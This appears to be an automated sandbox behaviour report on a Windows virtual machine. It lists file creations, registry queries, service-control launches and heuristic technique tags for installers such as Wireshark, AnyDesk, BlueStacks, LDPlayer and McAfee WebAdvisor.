File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide_alternate.db C:\Users\Admin\Downloads\AnyDesk.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_56DB209C155B5A05FCBF555DF7E6D1BB C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_96B11076AA4494A4A6143129F61AEC8B C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\229169D96B9C20761B929D428962A0A2_E724097EF7BBA8B1CB3228AA4D2ED312 C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\AF360AACB1570042DEFBC833317997D0_C2A57436D76F24DF346063556964EF64 C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\AEACCDA8653DD8D7B2EA32F21D15D44F_05097737526E5F006B53271077572A3C C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe N/A
File created C:\Windows\system32\msvcp140_1.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\system32\mfc140esn.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141 C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_466BAFE78D4077069B6C3828315C7C8D C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C3E814D1CB223AFCD58214D14C3B7EAB C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_93702E680A5530C052C8D2BA33A2225F C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\netpacer.inf_amd64_7d294c7fa012d315\netpacer.PNF C:\Program Files\Npcap\NPFInstall.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BAEBE581FCB73249406FC21094EA252E_BC0CE803EF41A748738619ED7838EEFC C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db C:\Users\Admin\Downloads\AnyDesk.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db C:\Users\Admin\Downloads\AnyDesk.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\BlueStacks_nxt\HD-Common.dll C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\7zr.exe N/A
File created C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\sw.pak C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\7zr.exe N/A
File created C:\Program Files\McAfee\Temp1169930912\wa_logo2.png C:\Users\Admin\AppData\Local\Temp\is-K0IBL.tmp\component1_extract\installer.exe N/A
File created C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-options-pl-PL.js C:\Program Files\McAfee\Temp1169930912\installer.exe N/A
File opened for modification C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\hi.pak C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\7zr.exe N/A
File created C:\Program Files\Wireshark\snmp\mibs\T11-FC-FSPF-MIB C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe N/A
File created C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-overlay-fr-FR.js C:\Program Files\McAfee\Temp1169930912\installer.exe N/A
File created C:\Program Files\BlueStacks_nxt\QtGraphicalEffects\FastBlur.qml C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\7zr.exe N/A
File opened for modification C:\Program Files\BlueStacks_nxt\QtGraphicalEffects\plugins.qmltypes C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\7zr.exe N/A
File created C:\Program Files\Wireshark\networkinformation\qnetworklistmanager.dll C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe N/A
File created C:\Program Files\McAfee\Temp1169930912\jslang\wa-res-install-nb-NO.js C:\Users\Admin\AppData\Local\Temp\is-K0IBL.tmp\component1_extract\installer.exe N/A
File created C:\Program Files\Wireshark\Qt6Gui.dll C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe N/A
File created C:\Program Files\Wireshark\snmp\mibs\[email protected] C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe N/A
File created C:\Program Files\Wireshark\Wireshark User's Guide\ChCapManageInterfacesSection.html C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe N/A
File created C:\Program Files\Wireshark\Wireshark User's Guide\ChWirelessBluetoothATTServerAttributes.html C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe N/A
File created C:\Program Files\Wireshark\Wireshark User's Guide\images\ws-csp-statistics.png C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe N/A
File created C:\Program Files\BlueStacks_nxt\libssl-1_1-x64.dll C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\7zr.exe N/A
File opened for modification C:\Program Files\BlueStacks_nxt\Assets C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe N/A
File created C:\Program Files\Wireshark\radius\dictionary.rfc2869 C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe N/A
File created C:\Program Files\Wireshark\snmp\mibs\[email protected] C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe N/A
File created C:\Program Files\McAfee\WebAdvisor\jslang\new-tab-res-toast-zh-TW.js C:\Program Files\McAfee\Temp1169930912\installer.exe N/A
File opened for modification C:\Program Files\BlueStacks_nxt\QtGraphicalEffects\InnerShadow.qml C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe N/A
File created C:\Program Files\Wireshark\snmp\mibs\DISMAN-PING-MIB C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe N/A
File created C:\Program Files\Wireshark\radius\dictionary.iana C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe N/A
File created C:\Program Files\Wireshark\udpdump.html C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe N/A
File created C:\Program Files\McAfee\WebAdvisor\MFW\packages_web_view\webadvisor\wa-ext-install-toast.js C:\Program Files\McAfee\Temp1169930912\installer.exe N/A
File created C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-upsell-toast-pt-BR.js C:\Program Files\McAfee\Temp1169930912\installer.exe N/A
File created C:\Program Files\Wireshark\README.windows.txt C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe N/A
File created C:\Program Files\Wireshark\diameter\Juniper.xml C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe N/A
File created C:\Program Files\McAfee\WebAdvisor\MFW\packages_web_view\webadvisor\wa-controller-checklist.js C:\Program Files\McAfee\Temp1169930912\installer.exe N/A
File created C:\Program Files\ReasonLabs\EPP\NAudio.dll C:\Users\Admin\AppData\Local\Temp\7zS0779229A\UnifiedStub-installer.exe N/A
File created C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\pl.pak C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\7zr.exe N/A
File created C:\Program Files\Wireshark\radius\dictionary.airespace C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe N/A
File created C:\Program Files\Wireshark\radius\dictionary.bt C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe N/A
File created C:\Program Files\Wireshark\snmp\mibs\TCP-ESTATS-MIB C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe N/A
File created C:\Program Files\Wireshark\Wireshark User's Guide\ChPresContextList.html C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe N/A
File opened for modification C:\Program Files\BlueStacks_nxt\QtGraphicalEffects\HueSaturation.qml C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\7zr.exe N/A
File opened for modification C:\Program Files\BlueStacks_nxt\QtQuick\Layouts\qquicklayoutsplugin.dll C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\7zr.exe N/A
File opened for modification C:\Program Files\BlueStacks_nxt\mediaservice C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe N/A
File created C:\Program Files\Wireshark\radius\dictionary.itk C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe N/A
File created C:\Program Files\Wireshark\snmp\mibs\SLS-NEGOTIATION-PIB-orig C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe N/A
File created C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-overlay-fi-FI.js C:\Program Files\McAfee\Temp1169930912\installer.exe N/A
File created C:\Program Files\Wireshark\snmp\mibs\FRSLD-MIB C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe N/A
File created C:\Program Files\Wireshark\snmp\mibs\MPLS-LDP-STD-MIB C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe N/A
File created C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-uninstall-pt-PT.js C:\Program Files\McAfee\Temp1169930912\installer.exe N/A
File created C:\Program Files\ldplayer9box\api-ms-win-crt-process-l1-1-0.dll F:\LDPlayer\LDPlayer9\dnrepairer.exe N/A
File created C:\Program Files\BlueStacks_nxt\Qt5Multimedia.dll C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe N/A
File opened for modification C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\ru.pak C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\7zr.exe N/A
File created C:\Program Files\BlueStacks_nxt\QtGraphicalEffects\ThresholdMask.qml C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe N/A
File created C:\Program Files\Wireshark\snmp\mibs\DS1-MIB C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe N/A
File created C:\Program Files\Wireshark\snmp\mibs\HC-RMON-MIB C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe N/A
File created C:\Program Files\ldplayer9box\NetLwfUninstall.exe F:\LDPlayer\LDPlayer9\dnrepairer.exe N/A
File created C:\Program Files\BlueStacks_nxt\QtGraphicalEffects\private\DropShadowBase.qml C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe N/A
File created C:\Program Files\Wireshark\Wireshark User's Guide\images\ws-bytes-pane-tabs.png C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe N/A
File created C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-oem-ss-toast-variants-it-IT.js C:\Program Files\McAfee\Temp1169930912\installer.exe N/A
File opened for modification C:\Program Files\BlueStacks_nxt\HD-DataManager.exe.config C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\7zr.exe N/A
File opened for modification C:\Program Files\BlueStacks_nxt\msvcp100.dll C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe N/A
File created C:\Program Files\Wireshark\zstd.dll C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe N/A
File opened for modification C:\Program Files\BlueStacks_nxt\BstkDD.dll C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\7zr.exe N/A
File created C:\Program Files\McAfee\WebAdvisor\MFW\packages_web_view\webadvisor\wa-dialog-balloon.css C:\Program Files\McAfee\Temp1169930912\installer.exe N/A
File created C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\te.pak C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\7zr.exe N/A
File created C:\Program Files\ldplayer9box\VBoxSampleDevice.dll F:\LDPlayer\LDPlayer9\dnrepairer.exe N/A
File created C:\Program Files\Wireshark\radius\dictionary.dlink C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe N/A
File created C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-pscore-toast-da-DK.js C:\Program Files\McAfee\Temp1169930912\installer.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\INF\c_fsopenfilebackup.PNF C:\Windows\system32\mmc.exe N/A
File created C:\Windows\INF\wsdprint.PNF C:\Windows\system32\mmc.exe N/A
File created C:\Windows\INF\c_camera.PNF C:\Windows\system32\mmc.exe N/A
File created C:\Windows\INF\c_fscfsmetadataserver.PNF C:\Windows\system32\mmc.exe N/A
File created C:\Windows\INF\c_fssecurityenhancer.PNF C:\Windows\system32\mmc.exe N/A
File created C:\Windows\INF\c_computeaccelerator.PNF C:\Windows\system32\mmc.exe N/A
File created C:\Windows\INF\c_fscompression.PNF C:\Windows\system32\mmc.exe N/A
File opened for modification C:\Windows\INF\setupapi.dev.log C:\Windows\system32\DrvInst.exe N/A
File created C:\Windows\INF\c_mcx.PNF C:\Windows\system32\mmc.exe N/A
File created C:\Windows\INF\c_monitor.PNF C:\Windows\system32\mmc.exe N/A
File created C:\Windows\INF\c_fsactivitymonitor.PNF C:\Windows\system32\mmc.exe N/A
File created C:\Windows\INF\c_linedisplay.PNF C:\Windows\system32\mmc.exe N/A
File created C:\Windows\INF\c_swcomponent.PNF C:\Windows\system32\mmc.exe N/A
File created C:\Windows\INF\c_fsinfrastructure.PNF C:\Windows\system32\mmc.exe N/A
File opened for modification C:\Windows\Logs\DISM\dism.log C:\Windows\SysWOW64\dism.exe N/A
File created C:\Windows\INF\remoteposdrv.PNF C:\Windows\system32\mmc.exe N/A
File created C:\Windows\INF\c_media.PNF C:\Windows\system32\mmc.exe N/A
File created C:\Windows\INF\c_fsvirtualization.PNF C:\Windows\system32\mmc.exe N/A
File created C:\Windows\Installer\e66ab34.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\INF\c_display.PNF C:\Windows\system32\mmc.exe N/A
File created C:\Windows\INF\oposdrv.PNF C:\Windows\system32\mmc.exe N/A
File created C:\Windows\INF\miradisp.PNF C:\Windows\system32\mmc.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\INF\setupapi.dev.log C:\Windows\system32\svchost.exe N/A
File created C:\Windows\INF\c_fssystem.PNF C:\Windows\system32\mmc.exe N/A
File created C:\Windows\INF\oem0.PNF C:\Program Files\ldplayer9box\NetLwfUninstall.exe N/A
File created C:\Windows\INF\oem1.PNF C:\Program Files\ldplayer9box\NetLwfUninstall.exe N/A
File created C:\Windows\INF\rdcameradriver.PNF C:\Windows\system32\mmc.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIAC64.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\INF\c_magneticstripereader.PNF C:\Windows\system32\mmc.exe N/A
File created C:\Windows\INF\c_processor.PNF C:\Windows\system32\mmc.exe N/A
File created C:\Windows\INF\c_volume.PNF C:\Windows\system32\mmc.exe N/A
File created C:\Windows\INF\ts_generic.PNF C:\Windows\system32\mmc.exe N/A
File created C:\Windows\INF\c_barcodescanner.PNF C:\Windows\system32\mmc.exe N/A
File opened for modification C:\Windows\Installer\e66ab1f.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIB139.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\INF\digitalmediadevice.PNF C:\Windows\system32\mmc.exe N/A
File created C:\Windows\INF\c_fsreplication.PNF C:\Windows\system32\mmc.exe N/A
File created C:\Windows\INF\c_netdriver.PNF C:\Windows\system32\mmc.exe N/A
File created C:\Windows\INF\c_holographic.PNF C:\Windows\system32\mmc.exe N/A
File created C:\Windows\Installer\e66ab1f.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\inf\oem3.inf C:\Windows\system32\DrvInst.exe N/A
File created C:\Windows\INF\c_smrvolume.PNF C:\Windows\system32\mmc.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\INF\c_fsencryption.PNF C:\Windows\system32\mmc.exe N/A
File created C:\Windows\INF\xusb22.PNF C:\Windows\system32\mmc.exe N/A
File opened for modification C:\Windows\INF\setupapi.dev.log C:\Program Files\Npcap\NPFInstall.exe N/A
File created C:\Windows\INF\c_cashdrawer.PNF C:\Windows\system32\mmc.exe N/A
File created C:\Windows\INF\c_fsquotamgmt.PNF C:\Windows\system32\mmc.exe N/A
File created C:\Windows\INF\c_fscopyprotection.PNF C:\Windows\system32\mmc.exe N/A
File created C:\Windows\INF\c_fsantivirus.PNF C:\Windows\system32\mmc.exe N/A
File created C:\Windows\INF\c_receiptprinter.PNF C:\Windows\system32\mmc.exe N/A
File created C:\Windows\INF\c_ucm.PNF C:\Windows\system32\mmc.exe N/A
File created C:\Windows\INF\oem2.PNF C:\Program Files\ldplayer9box\NetLwfUninstall.exe N/A
File opened for modification C:\Windows\Installer\e66ab0c.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\INF\c_fssystemrecovery.PNF C:\Windows\system32\mmc.exe N/A
File created C:\Windows\INF\c_fscontentscreener.PNF C:\Windows\system32\mmc.exe N/A
File created C:\Windows\INF\c_scmdisk.PNF C:\Windows\system32\mmc.exe N/A
File created C:\Windows\Installer\e66ab1e.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\inf\oem3.inf C:\Windows\system32\DrvInst.exe N/A
File created C:\Windows\INF\c_fscontinuousbackup.PNF C:\Windows\system32\mmc.exe N/A
File created C:\Windows\INF\c_firmware.PNF C:\Windows\system32\mmc.exe N/A
File opened for modification C:\Windows\Logs\DISM\dism.log C:\Users\Admin\AppData\Local\Temp\A7E12E4D-5925-444A-8813-8C6810544BDC\dismhost.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Access Token Manipulation: Create Process with Token

defense_evasion privilege_escalation
Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\SYSTEM32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh N/A N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh N/A N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh N/A N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh N/A N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh N/A N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh N/A N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\SYSTEM32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\SYSTEM32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh N/A N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh N/A N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\SYSTEM32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh N/A N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\SYSTEM32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\SYSTEM32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\SYSTEM32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\SYSTEM32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh N/A N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh N/A N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh N/A N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\SYSTEM32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\SYSTEM32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\SYSTEM32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\SYSTEM32\netsh.exe N/A

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\is-PKQAV.tmp\smartgaga-android-emulator-1.1.646.1-installer_pD-oKg1.tmp
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\is-PKQAV.tmp\smartgaga-android-emulator-1.1.646.1-installer_pD-oKg1.tmp

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID C:\Windows\system32\DrvInst.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\LowerFilters C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\mmc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 C:\Windows\system32\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID C:\Windows\system32\DrvInst.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 C:\Program Files\Npcap\NPFInstall.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\Control C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\system32\mmc.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A\ C:\Windows\system32\mmc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\CompatibleIDs C:\Windows\system32\DrvInst.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002 C:\Windows\system32\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Phantom C:\Windows\system32\DrvInst.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Phantom C:\Windows\system32\mmc.exe N/A
